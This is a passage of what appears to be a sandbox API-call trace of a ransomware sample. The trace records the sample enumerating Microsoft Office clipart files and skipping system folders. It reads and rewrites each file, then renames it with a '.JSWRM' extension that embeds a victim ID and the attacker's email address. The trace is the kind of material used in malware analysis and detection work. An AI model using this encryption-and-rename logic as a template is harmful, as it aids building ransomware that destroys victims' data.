nFileSizeLow=0x8a12, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0086428.WMF", cAlternateFileName="")) returned 1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2=".") returned 1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="..") returned 1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="...") returned 1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="windows") returned -1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="recovery") returned -1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="perflogs") returned -1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="documents and settings") returned 1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="system volume information") returned -1 [0079.396] lstrcmpiW (lpString1="J0086428.WMF", lpString2="msocache") returned -1 [0079.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0079.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086428.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086428.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086428.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0079.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086428.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086428.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086428.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086428.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.397] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35346) returned 1 [0079.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8a10) returned 0x24d210 [0079.397] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8a10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8a10, lpOverlapped=0x0) returned 1 [0079.400] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.400] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8a10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8a10, lpOverlapped=0x0) returned 1 [0079.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.402] CloseHandle (hObject=0x314) returned 1 [0079.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0079.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0079.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0079.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0079.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0079.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.402] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086428.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086428.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0079.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.403] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe00f20a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe00f20a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x829a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0086432.WMF", cAlternateFileName="")) returned 1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2=".") returned 1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="..") returned 1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="...") returned 1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="windows") returned -1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="recovery") returned -1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="perflogs") returned -1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="documents and settings") returned 1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="system volume information") returned -1 [0079.403] lstrcmpiW (lpString1="J0086432.WMF", lpString2="msocache") returned -1 [0079.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0079.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086432.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086432.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086432.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0079.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086432.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086432.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086432.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.404] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33434) returned 1 [0079.404] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8290) returned 0x24d210 [0079.405] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8290, lpOverlapped=0x0) returned 1 [0079.409] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.409] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8290, lpOverlapped=0x0) returned 1 [0079.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.410] CloseHandle (hObject=0x314) returned 1 [0079.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0079.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0079.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0079.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0079.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0079.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086432.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086432.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0079.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.411] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x375e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0086478.WMF", cAlternateFileName="")) returned 1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2=".") returned 1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="..") returned 1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="...") returned 1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="windows") returned -1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="recovery") returned -1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="perflogs") returned -1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="documents and settings") returned 1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="system volume information") returned -1 [0079.411] lstrcmpiW (lpString1="J0086478.WMF", lpString2="msocache") returned -1 [0079.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0079.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086478.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086478.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086478.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0079.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0079.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086478.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086478.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086478.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0079.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0079.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086478.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.412] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14174) returned 1 [0079.412] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3750) returned 0x24d210 [0079.413] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3750, lpOverlapped=0x0) returned 1 [0079.433] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.434] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3750, lpOverlapped=0x0) returned 1 [0079.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.434] CloseHandle (hObject=0x314) returned 1 [0079.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0079.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0079.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0079.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0079.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0079.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.434] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086478.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086478.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0079.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.458] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4dba, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0089945.WMF", cAlternateFileName="")) returned 1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2=".") returned 1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="..") returned 1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="...") returned 1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="windows") returned -1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="recovery") returned -1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="perflogs") returned -1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="documents and settings") returned 1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="system volume information") returned -1 [0079.458] lstrcmpiW (lpString1="J0089945.WMF", lpString2="msocache") returned -1 [0079.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0089945.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0089945.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0089945.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0089945.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0089945.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, 